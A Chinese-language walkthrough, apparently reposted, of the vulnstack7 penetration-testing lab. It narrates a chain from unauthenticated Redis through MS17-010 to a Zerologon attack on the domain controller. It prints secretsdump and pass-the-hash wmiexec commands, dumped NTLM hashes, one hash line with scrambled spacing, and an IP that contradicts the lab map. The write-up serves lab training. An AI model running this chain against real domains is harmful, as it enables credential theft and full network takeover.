栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

vulnstack7 writeup

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulnstack7 writeup

环境配置 靶场http://vulnstack.qiyuanxuetang.net/vuln/detail/9/

WEB1(ubuntu):
双网卡
192.168.1.15
192.168.52.10

PC1:
双网卡
192.168.52.30
192.168.93.20

WEB2(ubuntu):
双网卡
192.168.52.20
192.168.93.10

PC2:
192.168.93.40

域控:
192.168.93.30

开始打靶

扫描端口发现redis

redis未授权,使用工具进行图形化写入公钥

https://github.com/qishibo/AnotherRedisDesktopManager/releases/tag/v1.5.1

用kali进行连接,成功获取root权限并且发现网段192.168.52.10

用msf上传fscan对192.168.52.0/24进行扫描

发现192.168.52.30存在通达oa以及ms17010

192.168.52.20:8000 为Laravel

192.168.52.10:81 端口也为Laravel,推测为nginx的反向代理

先搞192.168.52.30

在主机192.168.52.10上 做frp代理

测试下代理,没有问题

两个方向:

1、通达oa漏洞

这个直接在windows上搞

访问http://192.168.52.30:8080/,利用通达oa任意用户登录进入后台

进入后台发现试用期过了,尬住了

这条线先放下,搞ms17010

2、MS17010

用kali proxychains走代理

成功获取win7主机权限

发现双网卡,通192.168.93.0/24,发现域whoamianony.org

然后发现msf有点玩不明白,因为主机出网,换cs

获取域用户账号密码

横向发现192.168.93.30,40

确定域控为192.168.93.30,40为域内另一台主机,存在ms17010

用20做代理,先打一下40

成功获取主机权限,但发现其不出网,所以用20做中转上线cs

下一步打域控,用到漏洞CVE-2020-1472

利用工具地址

https://github.com/VoidSec/CVE-2020-1472

python3 secretsdump.py whoamianony/DC$@192.168.83.30 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.orgbunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.orgmoretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC : 1002 : a a d 3 b 435 b 51404 e e a a d 3 b 435 b 51404 e e : 31 d 6 c f e 0 d 16 a e 931 b 73 c 59 d 7 e 0 c 089 c 0 : : : P C 2 :1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: PC2 :1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::PC2:1113:aad3b435b51404eeaad3b435b51404ee:cda321ff9d86cdce7e989cef83ef9f3a:::

proxychains wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec whoamianony/administrator@192.168.93.30

获取域控权限

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/730454.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号